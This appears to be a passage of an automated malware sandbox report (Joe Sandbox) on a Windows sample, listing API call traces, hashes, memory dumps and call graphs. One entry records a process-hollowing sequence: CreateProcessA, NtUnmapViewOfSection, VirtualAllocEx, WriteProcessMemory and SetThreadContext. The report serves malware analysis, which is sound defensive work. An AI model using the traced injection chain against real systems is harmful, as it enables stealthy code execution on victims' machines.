            • API String ID: 427699356-1596923502
            • Opcode ID: 01a20a6393f6cf1e01e81d8ef9af866549bd590d312b5bd55c7394e971cc1238
            • Instruction ID: 266b505f4b4a70e0031bd9b61304a7f29979de1156be46298b6644775383f0d6
            • Opcode Fuzzy Hash: 01a20a6393f6cf1e01e81d8ef9af866549bd590d312b5bd55c7394e971cc1238
            • Instruction Fuzzy Hash: 70F0B4B2B04201AFDB00EBA19E49AAF36589B40348F14443BB142F50C2D6BC4941AB6D
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000,00000000,00403498,004032EB,00000000), ref: 004034DA
            • GlobalFree.KERNEL32(?), ref: 004034E1
            Strings
            • "C:\Users\user\Desktop\Hu25VEa8Dr.exe", xrefs: 004034D2
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Free$GlobalLibrary
            • String ID: "C:\Users\user\Desktop\Hu25VEa8Dr.exe"
            • API String ID: 1100898210-618081267
            • Opcode ID: 46acf84ebda6383aa3704241e203cd439e3c816428f1e63aa7a51627b246d5e2
            • Instruction ID: a7ab284cabc648ba81e11ba063b903b3b671d5f7e61a69f5101281db245b6d62
            • Opcode Fuzzy Hash: 46acf84ebda6383aa3704241e203cd439e3c816428f1e63aa7a51627b246d5e2
            • Instruction Fuzzy Hash: E1E08C329110209BD6221F05AE0575A7B6D6B44B32F02802AE9407B2A087746C424BDD
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Hu25VEa8Dr.exe,C:\Users\user\Desktop\Hu25VEa8Dr.exe,80000000,00000003), ref: 0040554C
            • CharPrevA.USER32(80000000,00000000), ref: 0040555A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: CharPrevlstrlen
            • String ID: C:\Users\user\Desktop
            • API String ID: 2709904686-66916594
            • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
            • Instruction ID: fca702df0190f5d4796b13fce4c8f5ccfdab60c3fa8ed772e71c257c4247ae30
            • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
            • Instruction Fuzzy Hash: 39D0A772508EB07EE70366149C00B9F7A88CF13340F094462E040A61D4C27C4D418FFD
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565F
            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405678
            • CharNextA.USER32(00000000), ref: 00405686
            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040568F
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: lstrlen$CharNextlstrcmpi
            • String ID:
            • API String ID: 190613189-0
            • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
            • Instruction ID: fee4d645b7b415a6dc1afaac75e8b1817c7eae67fc86a6e8a33b60f3285d70db
            • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
            • Instruction Fuzzy Hash: 05F0A736309D519AC2125B295C04A6F6A98EF91314B58097AF444F2140E33A9C119BBF
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:13.8%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:5.9%
            Total number of Nodes:303
            Total number of Limit Nodes:7
            execution_graph 1570 10001000 LoadLibraryA 1582 10001303 GetProcAddress 1570->1582 1573 10001098 RtlZeroMemory 1574 100010cb LoadLibraryA 1573->1574 1575 100010f4 CreateProcessA NtUnmapViewOfSection 1574->1575 1577 10001157 VirtualAllocEx WriteProcessMemory 1575->1577 1579 10001209 SetThreadContext 1577->1579 1581 100012fd 1579->1581 1583 10001339 GetProcAddress LoadLibraryA 1582->1583 1584 10001058 GetCommandLineA PathGetArgsA 1583->1584 1584->1573 1871 401040 1876 401050 ??0_Winit@std@@QAE 1871->1876 1877 10003940 1878 100039d2 1877->1878 1880 1000395e 1877->1880 1880->1878 1881 10003848 RtlUnwind 1880->1881 1882 10003860 1881->1882 1882->1880 1883 401000 1888 401010 ??0Init@ios_base@std@@QAE 1883->1888 1889 21000 malloc 1890 21018 wsprintfA 1889->1890 1891 210ce _fullpath 1889->1891 1890->1891 1893 21042 __allrem 1890->1893 1892 210b0 wsprintfA 1892->1891 1893->1892 1894 31000 FillConsoleOutputCharacterA 1895 3103e FillConsoleOutputAttribute GetModuleHandleW 1894->1895 1897 100035c4 1898 100035d3 1897->1898 1899 100035d8 MultiByteToWideChar 1898->1899 1903 1000363e 1898->1903 1900 100035f1 LCMapStringW 1899->1900 1899->1903 1901 1000360c 1900->1901 1900->1903 1902 10003612 1901->1902 1905 10003652 1901->1905 1902->1903 1904 10003620 LCMapStringW 1902->1904 1904->1903 1905->1903 1906 1000368a LCMapStringW 1905->1906 1906->1903 1907 100036a2 WideCharToMultiByte 1906->1907 1907->1903 1909 401788 _exit 1622 100026aa 1625 100026bc 1622->1625 1626 100026b9 1625->1626 1628 100026c3 1625->1628 1628->1626 1629 100026e8 1628->1629 1630 100026f5 1629->1630 1634 100026fb 1629->1634 1636 100021f5 1630->1636 1632 10002704 1633 10002707 HeapAlloc 1632->1633 1635 1000271c 1633->1635 1634->1632 1634->1633 1634->1635 1635->1628 1637 10002227 1636->1637 1638 100022c6 1637->1638 1641 100022d5 1637->1641 1642 100024fe 1637->1642 1638->1641 1649 100025af 1638->1649 1641->1634 1643 10002541 RtlAllocateHeap 1642->1643 1644 10002511 HeapReAlloc 1642->1644 1646 10002591 1643->1646 1647 10002567 VirtualAlloc 1643->1647 1645 10002530 1644->1645 1644->1646 1645->1643 1646->1638 1647->1646 1648 10002581 HeapFree 1647->1648 1648->1646 1650 100025c1 VirtualAlloc 1649->1650 1652 1000260a 1650->1652 1652->1641 1925 1000154b 1926 1000156b 3 API calls 1925->1926 1927 10001558 1926->1927 1656 1000144e 1659 10001461 1656->1659 1660 1000146a 1656->1660 1657 10001492 1659->1657 1661 100014b2 1659->1661 1663 10001396 63 API calls 1659->1663 1660->1657 1660->1659 1664 10001396 1660->1664 1661->1657 1662 10001396 63 API calls 1661->1662 1662->1657 1663->1661 1665 1000139d GetVersion 1664->1665 1669 1000141b 1664->1669 1684 1000161e HeapCreate 1665->1684 1666 10001415 1666->1659 1668 100013af 1668->1666 1671 100013b8 GetCommandLineA 1668->1671 1669->1666 1670 1000143e 1669->1670 1759 1000155c 1669->1759 1691 1000187a 1670->1691 1700 10001ba3 1671->1700 1679 10001400 1737 10001956 1679->1737 1681 10001405 1746 1000189d 1681->1746 1683 1000140a 1683->1666 1685 10001653 1684->1685 1686 1000163e 1684->1686 1685->1668 1762 10001e61 HeapAlloc 1686->1762 1689 10001656 1689->1668 1690 10001647 HeapDestroy 1690->1685 1692 10001880 1691->1692 1694 10001443 1692->1694 1764 1000271e 1692->1764 1695 1000165a 1694->1695 1696 100016b0 HeapFree HeapDestroy 1695->1696 1697 1000166c 1695->1697 1696->1666 1698 1000167c VirtualFree VirtualFree HeapFree 1697->1698 1698->1698 1699 100016ae 1698->1699 1699->1696 1701 10001bf1 1700->1701 1702 10001bbe GetEnvironmentStringsW 1700->1702 1704 10001bc6 1701->1704 1705 10001be2 1701->1705 1703 10001bd2 GetEnvironmentStrings 1702->1703 1702->1704 1703->1705 1708 100013f6 1703->1708 1706 10001c0a WideCharToMultiByte 1704->1706 1707 10001bfe GetEnvironmentStringsW 1704->1707 1705->1708 1709 10001c90 1705->1709 1710 10001c84 GetEnvironmentStrings 1705->1710 1712 10001c70 FreeEnvironmentStringsW 1706->1712 1713 10001c3e 1706->1713 1707->1706 1707->1708 1723 100016cf 1708->1723 1714 100026aa 6 API calls 1709->1714 1710->1708 1710->1709 1712->1708 1777 100026aa 1713->1777 1717 10001cab 1714->1717 1719 10001cc1 FreeEnvironmentStringsA 1717->1719 1718 10001c4d WideCharToMultiByte 1720 10001c67 1718->1720 1721 10001c5e 1718->1721 1719->1708 1720->1712 1722 1000271e 4 API calls 1721->1722 1722->1720 1724 100026aa 6 API calls 1723->1724 1725 100016e0 1724->1725 1726 100016ee GetStartupInfoA 1725->1726 1780 100014eb 1725->1780 1729 1000173a 1726->1729 1730 100017ff 1726->1730 1729->1730 1733 100026aa 6 API calls 1729->1733 1736 100017ab 1729->1736 1731 10001866 SetHandleCount 1730->1731 1732 10001826 GetStdHandle 1730->1732 1731->1679 1732->1730 1734 10001834 GetFileType 1732->1734 1733->1729 1734->1730 1735 100017cd GetFileType 1735->1736 1736->1730 1736->1735 1738 10001968 1737->1738 1739 1000196d GetModuleFileNameA 1737->1739 1806 10002c7f 1738->1806 1741 10001990 1739->1741 1742 100026aa 6 API calls 1741->1742 1743 100019b1 1742->1743 1744 100019c1 1743->1744 1745 100014eb 7 API calls 1743->1745 1744->1681 1745->1744 1747 100018aa 1746->1747 1749 100018af 1746->1749 1748 10002c7f 19 API calls 1747->1748 1748->1749 1750 100026aa 6 API calls 1749->1750 1751 100018dc 1750->1751 1753 100014eb 7 API calls 1751->1753 1758 100018f0 1751->1758 1752 10001933 1754 1000271e 4 API calls 1752->1754 1753->1758 1755 1000193f 1754->1755 1755->1683 1756 100026aa 6 API calls 1756->1758 1757 100014eb 7 API calls 1757->1758 1758->1752 1758->1756 1758->1757 1860 1000156b 1759->1860 1763 10001643 1762->1763 1763->1689 1763->1690 1765 10002727 1764->1765 1766 1000274b 1764->1766 1767 10002733 1765->1767 1768 1000273d HeapFree 1765->1768 1766->1692 1771 10001eca 1767->1771 1768->1766 1770 10002739 1770->1692 1773 10001f11 1771->1773 1772 10002103 VirtualFree 1774 10002167 1772->1774 1773->1772 1776 100021bd 1773->1776 1775 10002176 VirtualFree HeapFree 1774->1775 1774->1776 1775->1776 1776->1770 1778 100026bc 6 API calls 1777->1778 1779 10001c44 1778->1779 1779->1712 1779->1718 1781 100014f5 1780->1781 1782 10001507 1781->1782 1786 10001cd5 1781->1786 1792 10001d0e 1782->1792 1787 10001cdf 1786->1787 1788 10001d0c 1787->1788 1789 10001d0e 7 API calls 1787->1789 1788->1782 1790 10001cf6 1789->1790 1791 10001d0e 7 API calls 1790->1791 1791->1788 1794 10001d21 1792->1794 1793 10001510 1793->1726 1794->1793 1795 10001e38 1794->1795 1796 10001d61 1794->1796 1798 10001e4b GetStdHandle WriteFile 1795->1798 1796->1793 1797 10001d6d GetModuleFileNameA 1796->1797 1799 10001d85 1797->1799 1798->1793 1801 10002fd5 1799->1801 1802 10002fe2 LoadLibraryA 1801->1802 1804 10003024 1801->1804 1803 10002ff3 GetProcAddress 1802->1803 1802->1804 1803->1804 1805 1000300a GetProcAddress GetProcAddress 1803->1805 1804->1793 1805->1804 1807 10002c88 1806->1807 1808 10002c8f 1806->1808 1810 100028bb 1807->1810 1808->1739 1817 10002a54 1810->1817 1812 10002a48 1812->1808 1815 100028fe GetCPInfo 1816 10002912 1815->1816 1816->1812 1822 10002afa GetCPInfo 1816->1822 1818 10002a74 1817->1818 1819 10002a64 GetOEMCP 1817->1819 1820 100028cc 1818->1820 1821 10002a79 GetACP 1818->1821 1819->1818 1820->1812 1820->1815 1820->1816 1821->1820 1823 10002b1d 1822->1823 1829 10002be5 1822->1829 1830 100036ff 1823->1830 1828 100034b0 9 API calls 1828->1829 1829->1812 1831 10003730 GetStringTypeW 1830->1831 1832 10003748 1830->1832 1831->1832 1833 1000374c GetStringTypeA 1831->1833 1834 10003773 GetStringTypeA 1832->1834 1835 10003797 1832->1835 1833->1832 1836 10002b99 1833->1836 1834->1836 1835->1836 1838 100037ad MultiByteToWideChar 1835->1838 1842 100034b0 1836->1842 1838->1836 1839 100037d1 1838->1839 1839->1836 1840 1000380b MultiByteToWideChar 1839->1840 1840->1836 1841 10003824 GetStringTypeW 1840->1841 1841->1836 1843 100034e0 LCMapStringW 1842->1843 1844 100034fc 1842->1844 1843->1844 1845 10003504 LCMapStringA 1843->1845 1847 10003562 1844->1847 1848 10003545 LCMapStringA 1844->1848 1845->1844 1846 10002bbd 1845->1846 1846->1828 1847->1846 1849 10003578 MultiByteToWideChar 1847->1849 1848->1846 1849->1846 1850 100035a2 1849->1850 1850->1846 1851 100035d8 MultiByteToWideChar 1850->1851 1851->1846 1852 100035f1 LCMapStringW 1851->1852 1852->1846 1853 1000360c 1852->1853 1854 10003612 1853->1854 1856 10003652 1853->1856 1854->1846 1855 10003620 LCMapStringW 1854->1855 1855->1846 1856->1846 1857 1000368a LCMapStringW 1856->1857 1857->1846 1858 100036a2 WideCharToMultiByte 1857->1858 1858->1846 1861 10001577 GetCurrentProcess TerminateProcess 1860->1861 1864 10001588 1860->1864 1861->1864 1862 10001567 1862->1670 1863 100015f2 ExitProcess 1864->1862 1864->1863 1865 40160f 1868 4015e3 1865->1868 1867 401618 1869 4015f8 __dllonexit 1868->1869 1870 4015ec _onexit 1868->1870 1869->1867 1870->1867 1958 401070 ??1_Winit@std@@QAE 1959 401030 ??1Init@ios_base@std@@QAE 1585 401636 __set_app_type __p__fmode __p__commode 1586 4016a5 1585->1586 1587 4016b9 1586->1587 1588 4016ad __setusermatherr 1586->1588 1597 4017ac _controlfp 1587->1597 1588->1587 1590 4016be _initterm __getmainargs _initterm 1591 401712 GetStartupInfoA 1590->1591 1593 401746 GetModuleHandleA 1591->1593 1598 4012f0 ??2@YAPAXI GetCapture GetMenu GetMenuItemInfoA 1593->1598 1596 40176a exit _XcptFilter 1597->1590 1613 4015d8 free 1598->1613 1600 401332 malloc GetSystemInfo 1601 40139d 1600->1601 1614 401080 getenv 1601->1614 1603 4013be xupetipe _ftol 1605 40140a Negefibizoh 1603->1605 1606 401488 CreateHatchBrush ??2@YAPAXI Fetomekiratu 1605->1606 1607 401468 fread fclose 1605->1607 1608 4014e9 1606->1608 1611 4014df bedevahetay 1606->1611 1607->1606 1620 4011f0 ReadConsoleInputW 1608->1620 1612 401578 1611->1612 1612->1596 1613->1600 1616 4010be 1614->1616 1615 4011b8 1615->1603 1616->1615 1617 401131 1616->1617 1618 401139 malloc 1616->1618 1617->1618 1618->1615 1619 40114f 1618->1619 1619->1603 1621 40120c 1620->1621 1621->1611 1960 10003938 1963 10003940 1960->1963 1961 100039d2 1962 10003848 RtlUnwind 1962->1963 1963->1961 1963->1962 1964 10003678 1965 10003686 1964->1965 1966 1000368a LCMapStringW 1965->1966 1967 1000363e 1965->1967 1966->1967 1968 100036a2 WideCharToMultiByte 1966->1968 1968->1967 1653 1b1000 fopen 1654 1b101c fseek ftell fseek ??2@YAPAXI 1653->1654 1655 1b1063 mblen malloc 1653->1655 1970 100037fc 1971 10003803 1970->1971 1972 10003834 1971->1972 1973 1000380b MultiByteToWideChar 1971->1973 1973->1972 1974 10003824 GetStringTypeW 1973->1974 1974->1972 1943 2129f 1945 212bb 1943->1945 1947 212b2 1943->1947 1945->1947 1950 212e3 1945->1950 1951 211f4 1945->1951 1946 21303 1949 211f4 3 API calls 1946->1949 1946->1950 1947->1946 1948 211f4 3 API calls 1947->1948 1947->1950 1948->1946 1949->1950 1952 211fc 1951->1952 1953 2121d malloc 1952->1953 1954 21232 1952->1954 1957 2125c 1952->1957 1953->1954 1955 21236 _initterm 1953->1955 1954->1947 1955->1954 1956 21289 free 1956->1954 1957->1954 1957->1956

            Callgraph

            • Executed
            • Not Executed
            • Opacity -> Relevance
            • Disassembly available
            callgraph 0 Function_00401040 8 Function_00401050 0->8 30 Function_0040160F 0->30 1 Function_10001000 5 Function_10001303 1->5 2 Function_00021000 3 Function_00021100 2->3 87 Function_000211C0 2->87 4 Function_00031000 6 Function_10001604 7 Function_10001D0E 24 Function_10002840 7->24 32 Function_10002750 7->32 43 Function_10003060 7->43 44 Function_10002760 7->44 95 Function_10002FD5 7->95 9 Function_10002D10 10 Function_10003915 11 Function_001B1000 12 Function_1000161E 47 Function_10001E61 12->47 13 Function_1000271E 69 Function_10001E9F 13->69 91 Function_10001ECA 13->91 14 Function_1000151E 14->6 15 Function_1000391E 16 Function_1000331E 17 Function_10003A20 18 Function_10003220 19 Function_00401070 20 Function_10003938 20->15 25 Function_10003848 20->25 59 Function_1000388A 20->59 21 Function_10002D3C 22 Function_10003940 22->15 22->25 22->59 23 Function_00401000 23->30 31 Function_00401010 23->31 26 Function_001B1151 60 Function_001B1090 26->60 84 Function_001B10A6 26->84 27 Function_1000154B 50 Function_1000156B 27->50 28 Function_1000334C 29 Function_1000144E 61 Function_10001390 29->61 63 Function_10001396 29->63 73 Function_004015E3 30->73 33 Function_10003A50 34 Function_00031151 72 Function_000310A0 34->72 75 Function_000310A6 34->75 35 Function_10002A54 36 Function_10001956 57 Function_10002C7F 36->57 76 Function_100026AA 36->76 100 Function_100014EB 36->100 102 Function_100019EF 36->102 37 Function_10002757 38 Function_1000165A 39 Function_1000155C 39->50 40 Function_10002E5E 41 Function_10003860 42 Function_00401220 45 Function_10003160 46 Function_10002D60 48 Function_10003868 49 Function_10003369 50->6 51 Function_00401030 52 Function_10003674 53 Function_00401636 58 Function_004017C1 53->58 78 Function_004012F0 53->78 101 Function_004017AC 53->101 54 Function_10003378 55 Function_10003678 56 Function_1000187A 56->13 82 Function_100028BB 57->82 59->15 62 Function_10003495 63->12 63->14 63->36 63->38 63->39 63->56 67 Function_1000189D 63->67 74 Function_10001BA3 63->74 92 Function_100016CF 63->92 64 Function_004015D8 65 Function_10002E98 66 Function_0002129F 103 Function_000210F0 66->103 106 Function_000211F4 66->106 67->13 67->24 67->32 67->57 67->76 67->100 68 Function_10002A9E 70 Function_10002CA0 71 Function_100033A0 74->13 74->70 74->76 83 Function_100026BC 76->83 77 Function_100025AF 78->42 78->64 79 Function_004011F0 78->79 85 Function_00401080 78->85 80 Function_100034B0 80->17 94 Function_100036D4 80->94 81 Function_10002EB8 82->35 82->68 93 Function_10002AD1 82->93 108 Function_10002AFA 82->108 83->62 99 Function_100026E8 83->99 86 Function_100035C0 88 Function_100035C4 88->17 89 Function_100031C7 90 Function_00401788 91->45 92->76 92->100 96 Function_10001CD5 96->7 97 Function_10002EE0 98 Function_100031E5 105 Function_100021F5 99->105 100->7 100->96 104 Function_100038F2 105->77 113 Function_100024FE 105->113 107 Function_100037F8 108->80 114 Function_100036FF 108->114 109 Function_100031FC 110 Function_100037FC 111 Function_100039FD 111->59 112 Function_004017BE 114->17 114->33

            Control-flow Graph

            APIs
            • ??2@YAPAXI@Z.MSVCRT ref: 004012FB
            • GetCapture.USER32 ref: 0040130F
            • GetMenu.USER32 ref: 00401316
            • GetMenuItemInfoA.USER32 ref: 0040131D
              • Part of subcall function 004015D8: free.MSVCRT(00401332,00401332,00000000), ref: 004015DC
            • malloc.MSVCRT ref: 0040133E
            • GetSystemInfo.KERNELBASE(00000000), ref: 0040134D
            • xupetipe.GOZEKENEKA(?), ref: 004013D1
            • _ftol.MSVCRT ref: 004013EA
            • Negefibizoh.XUXOKUXOKA(0040328C,004042C0,?), ref: 0040145A
            • fread.MSVCRT ref: 00401478
            • fclose.MSVCRT ref: 0040147F
            • CreateHatchBrush.GDI32(00000005,00000000), ref: 00401491
            • ??2@YAPAXI@Z.MSVCRT ref: 0040149C
            • Fetomekiratu.ZOJEMILOCAN(00000000,?,00000004,?,01E00048,?,?,?), ref: 004014BD
            • bedevahetay.NATIGEZEHOLI(01E00048,?,01E00048,?,?,?), ref: 0040150C
              • Part of subcall function 004011F0: ReadConsoleInputW.KERNEL32(?,?,00000001,00000000), ref: 00401202
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.349512027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.349509506.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000002.00000002.349514776.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000002.00000002.349517219.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000002.00000002.349519601.0000000000405000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_Sahofivizu.jbxd
            Similarity
            • API ID: ??2@InfoMenu$BrushCaptureConsoleCreateFetomekiratuHatchInputItemNegefibizohReadSystem_ftolbedevahetayfclosefreadfreemallocxupetipe
            • String ID: D0@$H0@$LDs$P$T0@$`0@
            • API String ID: 2075003006-1845043185
            • Opcode ID: 53cd896a6e9f52e95d25f5558639e1f3db188788eb616e60ca084bd420d84f84
            • Instruction ID: 7e94330157edeea2d52b545d952624ab7b3320839cf697c0ec5b1c23d0548237
            • Opcode Fuzzy Hash: 53cd896a6e9f52e95d25f5558639e1f3db188788eb616e60ca084bd420d84f84
            • Instruction Fuzzy Hash: D271A2B0508340ABE310DF64EE49B5B7FD8AB85309F04457EF685772E1D7B98608CB6A
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • LoadLibraryA.KERNEL32(?), ref: 10001044
              • Part of subcall function 10001303: GetProcAddress.KERNEL32(?,?,?,00000000,100051F0,10005274,10001058,00000000,100051F0), ref: 1000131E
              • Part of subcall function 10001303: GetProcAddress.KERNEL32(?,?), ref: 1000134B
              • Part of subcall function 10001303: LoadLibraryA.KERNEL32(?,?), ref: 10001367
            • GetCommandLineA.KERNEL32(00000000,100051F0), ref: 10001058
            • PathGetArgsA.SHLWAPI(00000000), ref: 1000107C
            • RtlZeroMemory.NTDLL(10005210,00000044), ref: 100010A9
            • LoadLibraryA.KERNEL32(01DFFF6D), ref: 100010E6
            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000024,00000000,00000000,10005210,10005534), ref: 10001130
            • NtUnmapViewOfSection.NTDLL(00000068,?), ref: 10001146
            • VirtualAllocEx.KERNEL32(00000068,?,?,00003000,00000040), ref: 100011D0
            • WriteProcessMemory.KERNEL32(00000068,?,?,?,00000000), ref: 100011F4
            • SetThreadContext.KERNEL32(00000064,10005274), ref: 100012E7
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd
            Similarity
            • API ID: LibraryLoad$AddressMemoryProcProcess$AllocArgsCommandContextCreateLinePathSectionThreadUnmapViewVirtualWriteZero
            • String ID: (
            • API String ID: 2364053360-3887548279
            • Opcode ID: 037b24e94ce7eda0725ae1a1775957593b6f77e50722cac3224d5c9ff137c321
            • Instruction ID: 3686c257d1733d8f280bccd01df7fd3f1935d524a4d0ec349a118272831d3a8f
            • Opcode Fuzzy Hash: 037b24e94ce7eda0725ae1a1775957593b6f77e50722cac3224d5c9ff137c321
            • Instruction Fuzzy Hash: 6CA1B074601225DFE704CF58CCD8E667BA5FF4E38A78541A9E5068B376C732A812CF54
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            Memory Dump Source
            • Source File: 00000002.00000002.349512027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.349509506.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000002.00000002.349514776.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000002.00000002.349517219.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000002.00000002.349519601.0000000000405000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_Sahofivizu.jbxd
            Similarity
            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
            • String ID:
            • API String ID: 801014965-0
            • Opcode ID: f92d71296a11253ec965f9cb296b5f0c4059aa583f2d3de2ab08ccf73150820a
            • Instruction ID: 59e29d7587bae7e9570ce306a69a77950e06f0e43c92f3a1b352005f67b7f482
            • Opcode Fuzzy Hash: f92d71296a11253ec965f9cb296b5f0c4059aa583f2d3de2ab08ccf73150820a
            • Instruction Fuzzy Hash: 61416DB5900344AFDB209FA4DE49AAA7BB8FB49750F20057FF641B72E1D7784841CB18
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            Memory Dump Source
            • Source File: 00000002.00000002.349490851.00000000001B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001B0000, based on PE: true
            • Associated: 00000002.00000002.349488449.00000000001B0000.00000002.00000001.01000000.00000009.sdmpDownload File
            • Associated: 00000002.00000002.349493345.00000000001B2000.00000002.00000001.01000000.00000009.sdmpDownload File
            • Associated: 00000002.00000002.349495824.00000000001B4000.00000002.00000001.01000000.00000009.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_1b0000_Sahofivizu.jbxd
            Similarity
            • API ID: fseek$??2@fopenftellmallocmblen
            • String ID:
            • API String ID: 1956454988-0
            • Opcode ID: 378978aa552441da6b16bbd157b677f00902b07f63dfa66006d0b4d630a190ab
            • Instruction ID: 6987e4b794b39228d20832f65b84a5d905d6c2ea9f9323fa1c1492d26464bec0
            • Opcode Fuzzy Hash: 378978aa552441da6b16bbd157b677f00902b07f63dfa66006d0b4d630a190ab
            • Instruction Fuzzy Hash: C8010871644241ABD710BB65EC85B4737B8AF8C741F100655F518D7650D774A6A8CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • VirtualFree.KERNELBASE(01DF0584,00100000,00004000,?,?,?,?,10001448,1000148E,?,?,?), ref: 10001688
            • VirtualFree.KERNELBASE(01DF0584,00000000,00008000,?,?,10001448,1000148E,?,?,?), ref: 10001693
            • HeapFree.KERNEL32(00000000,?), ref: 100016A0
